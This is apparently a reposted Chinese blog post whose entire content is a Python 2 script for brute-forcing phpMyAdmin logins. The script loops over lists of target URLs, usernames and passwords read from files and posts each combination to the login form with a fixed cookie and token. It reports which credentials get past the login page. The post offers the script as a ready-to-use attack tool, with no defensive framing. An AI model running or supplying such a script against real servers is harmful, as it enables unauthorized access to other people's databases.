爆破phpmyadmin小脚本

 

 1 #!usr/bin/env python
 2 #encoding: utf-8
 3 #by i3ekr
 4 
 5 import requests
 6 
 7 
 8 
 9 headers = {'Content-Type':'application/x-www-form-urlencoded',
10         'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
11         'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
12         'Cookie':'pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8mb4_unicode_ci; phpMyAdmin=vo6nt8q71hsv93fb9a7c5b5oot2215gq'
13         }
14 def attack(host,username,password):
15     host = host + "/index.php"
16     payload ={'pma_username':username,
17           'pma_password':password,
18           'server':'1',
19           'target':'index.php',
20           'token':'bf8e4192569617d39070c5739cd1776f'}
21     try:
22         html = requests.post(host,headers=headers,data=payload).text        
23         if "themes/pmahomme/img/logo_right.png" in html:
24             print "[-] %s-%s"%(username,password)
25         else:
26             print "[+] %s-%s-%s"%(host,username,password)
27     except Exception as e:
28         pass
29 
30 with open('./url.txt','r') as url:
31     host_t = url.readlines()
32     with open('./username.txt','r') as username:
33         username_t = username.readlines()
34         with open('./password.txt','r') as password:
35             password_t = password.readlines()
36             for h in host_t:
37                 host = h.strip()
38                 for u in username_t:
39                     username = u.strip()
40                     for p in password_t:
41                         password = p.strip()
42                         attack(host,username,password)

 

转载于:https://www.cnblogs.com/nul1/p/8976972.html